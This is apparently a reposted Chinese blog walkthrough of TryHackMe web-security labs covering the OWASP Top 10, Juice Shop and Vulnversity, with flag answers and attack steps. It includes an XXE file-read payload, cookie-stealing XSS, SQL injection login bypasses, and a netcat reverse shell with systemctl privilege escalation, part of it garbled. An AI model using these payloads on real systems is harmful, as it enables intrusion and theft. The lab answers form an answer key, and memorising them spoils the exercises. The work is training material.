tryhackme-Application-based Vulnerabilities
作者:互联网
Application-based vulnerabilities
文章目录
- Application-based vulnerabilities
- Web Fundamentals
- OWASP Top 10
- task1 Introduction
- task2 Accessing machines
- task3 [Severity 1] Injection
- task4 [Severity 1] OS Command Injection
- task5 [Severity 1] Command Injection Practical
- task6 [Severity 2] Broken Authentication
- task7 [Severity 2] Broken Authentication Practical
- task8 [Severity 3] Sensitive Data Exposure (Introduction)
- task9 [Severity 3] Sensitive Data Exposure (Supporting Material 1)
- task10 [Severity 3] Sensitive Data Exposure (Supporting Material 2)
- task11 [Severity 3] Sensitive Data Exposure (Challenge)
- task12 [Severity 4] XML External Entity
- task13 [Severity 4 XML External Entity - eXtensible Markup Language
- task14 [Severity 4] XML External Entity - DTD
- task15 [Severity 4] XML External Entity - XXE Payload
- task16[Severity 4] XML External Entity - Exploiting
- task17 [Severity 5] Broken Access Control
- task18[Severity 5] Broken Access Control (IDOR Challenge)
- task19 [Severity 6] Security Misconfiguration
- task20 [Severity 7] Cross-site Scripting
- task21 [Severity 8] Insecure Deserialization
- task22 [Severity 8] Insecure Deserialization - Objects
- task23 [Severity 8] Insecure Deserialization - Deserialization
- task24 [Severity 8] Insecure Deserialization - Cookies
- task25 [Severity 8] Insecure Deserialization - Cookies Practical
- task26 [Severity 8] Insecure Deserialization - Code Execution
- task27 [Severity 9] Components With Known Vulnerabilities - Intro
- task28 [Severity 9] Components With Known Vulnerabilities - Exploit
- task29 [Severity 9] Components With Known Vulnerabilities - Lab
- task30 [Severity 10] Insufficient Logging and Monitoring
- task31 What Next?
- OWASP Juice Shop
- Vulnversity :star:反弹shell :star:systemctl提权
Web Fundamentals
task1 Introduction and objectives
1.Read and understand the information
task2 How do we load websites?
1.What request verb is used to retrieve page content?
get
2.What port do web servers normally listen on?
80
3.What’s responsible for making websites look fancy?
CSS
网页的实际内容通常是HTML、CSS和JavaScript的组合。 HTML 定义页面结构和内容。CSS 允许您更改页面的外观,使其看起来花哨。JavaScript 是一种在浏览器中运行的编程语言,允许您使页面交互或加载额外的内容。
task3 More HTTP - Verbs and request formats
1.What verb would be used for a login?
post
2.What verb would be used to see your bank balance once you’re logged in?
get
3.Does the body of a GET request matter? Yea/Nay
Nay
4.What’s the status code for “I’m a teapot”?
418
IETF在1998年愚人节时发布的一个笑话RFC,具体可以参考RFC 2324 - Hyper Text Coffee Pot Control Protocol (HTCPCP/1.0)超文本咖啡壶控制协议。
htcpcp1.0协议中的418的意义是:当客户端给一个茶壶发送泡咖啡的请求时,茶壶就返回一个418错误状态码,表示“我是一个茶壶“
5.What status code will you get if you need to authenticate to access some content, and you’re unauthenticated?
401
task4 Cookies, tasty!
1.Read and try and understand this information. Check out the link for extra information
task5 Mini CTF
1.What’s the GET flag?
thm{162520bec925bd7979e9ae65a725f99f}
curl http://10.10.103.59:8081/ctf/get
2.What’s the POST flag?
thm{3517c902e22def9c6e09b99a9040ba09}
curl -d flag_please http://10.10.103.59:8081/ctf/post
3.What’s the “Get a cookie” flag?
thm{91b1ac2606f36b935f465558213d7ebd}
火狐浏览器访问http://10.10.103.59:8081/ctf/getcookie,查看浏览器cookie
4.What’s the “Set a cookie” flag?
thm{c10b5cb7546f359d19c747db2d0f47b3}
修改domain为10.10.103.59的cookie名/值都为flagpls,访问http://10.10.103.59:8081/ctf/sendcookie;
或者在上一问使用curl -c cookie.txt http://10.10.103.59:8081/ctf/getcookie 获取cookie,修改cookie名/值为flagpls,再使用curl -b cookie.txt http://10.10.103.59:8081/ctf/sendcookie 得到flag
OWASP Top 10
task1 Introduction
- Injection
- Broken Authentication
- Sensitive Data Exposure
- XML External Entity
- Broken Access Control
- Security Misconfiguration
- Cross-site Scripting
- Insecure Deserialization
- Components with Known Vulnerabilities
- Insufficent Logging & Monitoring
task2 Accessing machines
Connect to our network or deploy the AttackBox.
task3 [Severity 1] Injection
I’ve understood Injection attacks.
task4 [Severity 1] OS Command Injection
I’ve understood command injection.
task5 [Severity 1] Command Injection Practical
1.What strange text file is in the website root directory?
drpepper.txt
2.How many non-root/non-service/non-daemon users are there?
0
3.What user is this app running as?
www-data
4.What is the user’s shell set as?
usr/sbin/nologin
5.What version of Ubuntu is running?
18.04.4
6.Print out the MOTD. What favorite beverage is shown?
DR PEPPER
00-header – /etc/update-motd.d/00-header 修改Ubuntu下ssh登录欢迎信息
task6 [Severity 2] Broken Authentication
1.I’ve understood broken authentication mechanisms.
task7 [Severity 2] Broken Authentication Practical
1.What is the flag that you found in darren’s account?
fe86079416a21a3c99937fea8874b667
注册用户时将darren和 darren认定为不同账户,登陆时认定为同一账户造成逻辑漏洞
2.Now try to do the same trick and see if you can login as arthur.
3.What is the flag that you found in arthur’s account?
d9acof7db4fda460ac3edeb75d75e16e
task8 [Severity 3] Sensitive Data Exposure (Introduction)
Read the introduction to Sensitive Data Exposure and deploy the machine.
task9 [Severity 3] Sensitive Data Exposure (Supporting Material 1)
Read and understand the supporting material on SQLite Databases.
task10 [Severity 3] Sensitive Data Exposure (Supporting Material 2)
Read the supporting material about cracking hashes.
task11 [Severity 3] Sensitive Data Exposure (Challenge)
1.What is the name of the mentioned directory?
/assets
2.Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?
webapp.db
3.Use the supporting material to access the sensitive data. What is the password hash of the admin user?
6eea9b7ef19179a06954edd0f6c05ceb
4.What is the admin’s plaintext password?
qwertyuiop
5.Login as the admin. What is the flag?
THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}
task12 [Severity 4] XML External Entity
Deploy the machine attached to the task.
task13 [Severity 4 XML External Entity - eXtensible Markup Language
1.Full form of XML
eXtensible Markup Language
xml(eXtensible Markup Language)可扩展标记语言
2.Is it compulsory to have XML prolog in XML documents?
no
3.Can we validate XML documents against a schema?
yes
4.How can we specify XML version and encoding in XML document?
XML Prolog
task14 [Severity 4] XML External Entity - DTD
1.How do you define a new ELEMENT?
!ELEMENT
2.How do you define a ROOT element?
!DOCTYPE
3.How do you define a new ENTITY?
!ENTITY
!ELEMENT定义新的元素;!DOCTYPE定义根元素;!ENTITY定义新的实体
task15 [Severity 4] XML External Entity - XXE Payload
1.Try the payload mentioned in description on the website.
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
task16[Severity 4] XML External Entity - Exploiting
1.Try to display your own name using any payload.
2.See if you can read the /etc/passwd
3.What is the name of the user in /etc/passwd
falcon
4.Where is falcon’s SSH key located?
/home/falcon/.ssh/id_rsa
5.What are the first 18 characters for falcon’s private key
MIIEogIBAAKCAQEA7b
task17 [Severity 5] Broken Access Control
Read and understand how broken access control works.
task18[Severity 5] Broken Access Control (IDOR Challenge)
1.Read and understand how IDOR works.
2.Deploy the machine and go to http://MACHINE_IP - Login with the username being noot and the password test1234.
3.Look at other users notes. What is the flag?
flag{fivefourthree}
task19 [Severity 6] Security Misconfiguration
1.Deploy the VM
2.Hack into the webapp, and find the flag!
thm{4b9513968fd564a87b28aa1f9d672e17}
(https://github.com/NinjaJc01/PensiveNotes)
task20 [Severity 7] Cross-site Scripting
1.Deploy the VM
2.Navigate to http://10.10.131.49/ in your browser and click on the “Reflected XSS” tab on the navbar; craft a reflected XSS payload that will cause a popup saying “Hello”.
ThereIsMoreToXSSThanYouThink
3.On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address.
ReflectiveXss4TheWin
<script>alert(window.location.hostname)</script>
4.Now navigate to http://10.10.131.49/ in your browser and click on the “Stored XSS” tab on the navbar; make an account.
Then add a comment and see if you can insert some of your own HTML.
HTML_T4gs
5.On the same page, create an alert popup box appear on the page with your document cookies.
W3LL_D0N3_LVL2
<script>alert(document.cookie)</script>
6.Change “XSS Playground” to “I am a hacker” by adding a comment and using Javascript.
websites_can_be_easily_defaced_with_xss
<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>
task21 [Severity 8] Insecure Deserialization
1.Who developed the Tomcat application?
Apache Software Foundation
2.What type of attack that crashes services can be performed with insecure deserialization?
Denial of Service
反序列化漏洞会造成Dos(Denial of Service)和远程代码执行RCE (Remote Code Execution)
task22 [Severity 8] Insecure Deserialization - Objects
if a dog was sleeping, would this be:
A) A State
B) A Behaviour
A Behaviour
task23 [Severity 8] Insecure Deserialization - Deserialization
What is the name of the base-2 formatting that data is sent across a network as?
binary
task24 [Severity 8] Insecure Deserialization - Cookies
1.If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?
webapp.com/login
2.What is the acronym for the web technology that Secure cookies work over?
https
secure属性只在https连接发送;http only 不允许js脚本读取cookie
task25 [Severity 8] Insecure Deserialization - Cookies Practical
1.1st flag (cookie value)
THM{good_old_base64_huh}
2.2nd flag (admin dashboard)
THM{heres_the_admin_flag}
task26 [Severity 8] Insecure Deserialization - Code Execution
flag.txt
执行修改后在Github上得到的python脚本,得到base64编码后的反弹shell脚本,写入cookie的encodepayload中发送请求
4a69a7ff9fd68
task27 [Severity 9] Components With Known Vulnerabilities - Intro
Read above.
task28 [Severity 9] Components With Known Vulnerabilities - Exploit
Read the above!
task29 [Severity 9] Components With Known Vulnerabilities - Lab
How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)
主页右下方点击Admin Login进入登录界面,万能密码 %’ or ‘1’='1进入后台页面,后台添加书籍信息存在任意文件上传漏洞,上传小马。返回页面,找到新增书籍,反弹shell成功
1611
task30 [Severity 10] Insufficient Logging and Monitoring
1.What IP address is the attacker using?
49.99.13.16
2.What kind of attack is being carried out?
暴力破解Brute Force
task31 What Next?
Read the above!
OWASP Juice Shop
task1 Open for business!
1.Deploy the VM attached to this task to get started! You can access this machine by using your browser-based machine, or if you’re connected through OpenVPN.
2.Once the machine has loaded, access it by copying and pasting its IP into your browser; if you’re using the browser-based machine, paste the machines IP into a browser on that machine.
task2 Let’s go on an adventure!
1.Question #1: What’s the Administrator’s email address?
The reviews show each user’s email address. Which, by clicking on the Apple Juice product, shows us the Admin email!
admin@juice-sh.op
2.We can now see the search parameter after the /#/search? the letter q
q
3.If we google “replicator” we will get the results indicating that it is from a TV show called Star Trek
Star Trek
tsak 3 Inject the juice
1.Question #1: Log into the administrator account!
32a5e0f21372bcc1000a6088b93b458e41f0e02a
使用万能密码登录,payload 1’ or ‘1’=‘1’–
2.Question #2: Log into the Bender account!
fb364762a3c102b2db932069c0e6b78e738d4066
同样使用万能密码,payload bender@juice-sh.op’–
task 4 Who broke my lock?!
1.Question #1: Bruteforce the Administrator account’s password!
c2110d06dc6f81c67cd8099ff0ba601241f1ac0e
暴力破解出admin@juice-sh.op账户的密码为admin123
2.Question #2: Reset Jim’s password!
094fbc9b48e525150ba97d05b942bbf114987257
安全问题为兄弟的中间名,上一问jim 与 Star Trek(星际迷航)有关,他的兄弟叫George Samuel Kirk
task 5 AH! Don’t look!
1.Question #1: Access the Confidential Document!
edf9281222395a1c5fee9b89e32175f1ccf50c5b
点击关于我们链接 http://10.10.164.205/ftp/legal.md ,进入ftp目录可以看到很多文件
2.Question #2: Log into MC SafeSearch’s account!
搜索MC SafeSearch,油管上有相关视频可得知他的密码为 "Mr. Noodles"但 "vowels into zeros"将元音字母变成0,密码为 Mr.N00dles
3.Question #3: Download the Backup file!
在ftp目录下载pack只允许age.json.bak文件报错只允许下载md和pdf文件,使用%00截断下载文件
task6 Who’s flying this thing?
1.Question #1: Access the administration page!
946a799363226a24822008503f5d1324536629a0
直接访问管理后台报错403,需要登录管理员账号才能访问
2.Question #2: View another user’s shopping basket!
41b997a36cc33fbe4f0ba018474e19ae5ce52121
burp截取访问购物车URLhttp://10.10.164.205/rest/basket/1,1代表用户ID,修改为其他用户ID即可平行越权访问
3.Question #3: Remove all 5-star reviews!
50c97bcce0b895e446d61c83a21df371ac2266ef
登录后台页面,删除右侧5星评论即可
task 7 Where did that come from?
1.Question #1: Perform a DOM XSS!
9aaf4bbea5c30d00a1f5bbcfce4db6d4b0efe0bf
<iframe src="javascript:alert(
xss)">
搜索框输入payload即可
2.Question #2: Perform a persistent XSS!
149aa8ce13d7a4a8a931472308e269c94dc5f156
对URL True-Client-IP没有做过滤
3.Question #3: Perform a reflected XSS!
23cefee1527bde039295b2616eeb29e1edc660a0
URLhttp://10.10.164.205/#/track-result?id=5267-d156f507ae884e75的参数id没有做过滤直接显示在页面上,id参数换成payload请求弹窗(建议使用firefox)
task 8 Exploration!
Access the /#/score-board/ page
7efd3174f9dd5baa03a7882027f2824d2f72d86e
/score-board 计分板页面
Vulnversity ⭐️反弹shell ⭐️systemctl提权
task1 Deploy the machine
无需回答
task2 Reconnaissance
1.There are many nmap “cheatsheets” online that you can use too.
无需回答
2.Scan the box, how many ports are open?
6
3.What version of the squid proxy is running on the machine?
3.5.12
4.How many ports will nmap scan if the flag -p-400 was used?
400
5.Using the nmap flag -n what will it not resolve?
DNS
-n 禁用DNS反向解析
6.What is the most likely operating system this machine is running?
Ubuntu
7.What port is the web server running on?
3333
task3 Locating directories using GoBuster
1.What is the directory that has an upload form page?
/internal/
task4 Compromise the webserver
1.Try upload a few file types to the server, what common extension seems to be blocked?
.php
2.Run this attack, what extension is allowed?
.phtml
3.What is the name of the user who manages the webserver?
bill
4.What is the user flag?
task5 Privilege Escalation
1.On the system, search for all SUID files. What file stands out?
/bin/systemctl
find / -user root -perm -4000 -exec ls -ldb {} ; 查找系统所有无法访问的文件
/bin/systemctl 文件具备suid位可以用来提权
2.Its challenge time! We have guided you through this far, are you able to exploit this system further to escalate your privileges and get the final answer?
Become root and get the last flag (/root/root.txt)
a58ff8579f0a9270368d33a9966c7fd5
www-data@vulnuniversity:/tmp$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.23.70 7788 >/tmp/f" > /tmp/shell.sh www-data@vulnuniversity:/tmp$ TF=$(mktemp).service www-data@vulnuniversity:/tmp$ echo '[Service] > Type=oneshot > ExecStart=/bin/sh -c "bash /tmp/shell.sh" > [Install] > WantedBy=multi-user.target' > $TF www-data@vulnuniversity:/tmp$ /bin/systemctl link $TF Created symlink from /etc/systemd/system/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service. www-data@vulnuniversity:/tmp$ /bin/systemctl enable --now $TF Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service.
提权思路 /bin/systemctl文件拥有sudo权限,新建一个service让systemctl加载服务,即可执行任意脚本
p$ TF=$(mktemp).service
www-data@vulnuniversity:/tmp$ echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c “bash /tmp/shell.sh”
[Install]
WantedBy=multi-user.target’ > T F w w w − d a t a @ v u l n u n i v e r s i t y : / t m p TF www-data@vulnuniversity:/tmp TFwww−data@vulnuniversity:/tmp /bin/systemctl link T F C r e a t e d s y m l i n k f r o m / e t c / s y s t e m d / s y s t e m / t m p . C H T u v f k a o z . s e r v i c e t o / t m p / t m p . C H T u v f k a o z . s e r v i c e . w w w − d a t a @ v u l n u n i v e r s i t y : / t m p TF Created symlink from /etc/systemd/system/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service. www-data@vulnuniversity:/tmp TFCreatedsymlinkfrom/etc/systemd/system/tmp.CHTuvfkaoz.serviceto/tmp/tmp.CHTuvfkaoz.service.www−data@vulnuniversity:/tmp /bin/systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service.提权思路 /bin/systemctl文件拥有sudo权限,新建一个service让systemctl加载服务,即可执行任意脚本
标签:tmp,XML,What,based,Severity,Vulnerabilities,Application,flag,data 来源: https://blog.csdn.net/qq_36531487/article/details/118926721